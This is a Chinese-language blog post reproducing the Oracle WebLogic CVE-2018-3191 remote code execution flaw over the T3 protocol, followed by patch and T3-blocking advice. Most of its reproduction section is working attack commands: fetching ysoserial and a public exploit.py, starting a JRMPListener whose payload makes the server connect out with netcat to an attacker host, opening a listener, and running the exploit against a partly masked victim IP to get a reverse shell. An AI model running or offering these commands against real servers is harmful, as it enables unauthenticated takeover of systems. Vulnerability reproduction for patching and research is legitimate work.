Weblogic CVE-2018-3191远程代码命令执行漏洞复现

╰+攻爆jí腚メ 2024-04-07 10:57 88阅读 0赞

### 0x00 简介 ###

北京时间10月17日，Oracle官方发布的10月关键补充更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server，成功的漏洞利用可导致WebLogic Server被攻击者接管，从而造成远程代码执行。

### 0x01 漏洞复现 ###

目标weblogci服务器已开放了T3服务，该服务器是部署在linux下，可以用https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-262进行在 docker下部署测试环境。

![e6e34bd03c99b0573dd2f7a973e940a4.jpeg][]

1.在JRMPListener主机(公网上的一台主机,ubunut系统，IP地址为：149.28.\*.85)上运行以下命令:

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
    
    
    java  -cp  ysoserial-0.0.6-SNAPSHOT-BETA-all.jar  ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

如：

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc  -nv 149.28.*.85  5555'

//注意command目前只有nc反弹成功，bash反弹被转义了,本地监听1099端口，执行的命令是向weblogic服务器发送nc反弹命令的poc。

![bf6228aed1876c153a40f99d65c4ede0.jpeg][]

2.同时在JRMPListener主机另开一个命令窗口进行监听nc端口，命令如下：

nc  -lvvp  5555

![1899133828ff2048ef98bd8f120c01cb.jpeg][]

3.在本地的windows系统攻击者主机上运行此脚本：

weblogic-spring-jndi-12.2.1.3.jar 对于weblogic：

12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar 对于weblogic：

10.3.6.0

12.2.1.0

12.1.3.0

12.2.1.1

wget https://github.com/pyn3rd/CVE-2018-3191/blob/master/weblogic-spring-jndi-10.3.6.0.jar
    
    wget  https://github.com/pyn3rd/CVE-2018-3191/blob/master/weblogic-spring-jndi-12.2.1.3.jar
    
    wget https://raw.githubusercontent.com/Libraggbond/CVE-2018-3191/master/exploit.py
    
    python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
    
    python exploit.py  66.42.*.195 7001  weblogic-spring-jndi-10.3.6.0.jar  149.28.146.85    1099   //这里的66.42.*.195是weblogc服务器，7001为weblogic服务器端口;149.28.*.85为JRMPListener主机，主机的监听端口为1099

![fa35bc3fa5a4087c7b709334793bd62c.jpeg][]

最终可以看到反弹的shell:

![811832d6d4fcbad87185ecd03281ce72.jpeg][]

### 0x02 漏洞修复 ###

1.Oracle官方已经在10月关键补丁更新CPU(重要补丁更新)中修复了该漏洞，强烈建议受影响的用户尽快升级更新进行防护。

[https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html\#AppendixFMW][https_www.oracle.com_technetwork_security-advisory_cpuoct2018-4428296.html_AppendixFMW]

2.禁止T3协议

### 0x03 参考链接 ###

[https://mp.weixin.qq.com/s/ebKHjpbQcszAy\_vPocW0Sg][https_mp.weixin.qq.com_s_ebKHjpbQcszAy_vPocW0Sg]

[https://github.com/Libraggbond/CVE-2018-3191][https_github.com_Libraggbond_CVE-2018-3191]

[e6e34bd03c99b0573dd2f7a973e940a4.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/cac7083610a847699d8688eb68ee4274.jpeg
[bf6228aed1876c153a40f99d65c4ede0.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7fd0e4400cd547a9ac433ad767869aaf.jpeg
[1899133828ff2048ef98bd8f120c01cb.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/cd9867f3100d45fca3209da5feee4c49.jpeg
[fa35bc3fa5a4087c7b709334793bd62c.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e06a64fd3ec349e7abe7549b074ba0b8.jpeg
[811832d6d4fcbad87185ecd03281ce72.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/28dfb2efd2364e0da315020ba17c3103.jpeg
[https_www.oracle.com_technetwork_security-advisory_cpuoct2018-4428296.html_AppendixFMW]: https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW
[https_mp.weixin.qq.com_s_ebKHjpbQcszAy_vPocW0Sg]: https://mp.weixin.qq.com/s/ebKHjpbQcszAy_vPocW0Sg
[https_github.com_Libraggbond_CVE-2018-3191]: https://github.com/Libraggbond/CVE-2018-3191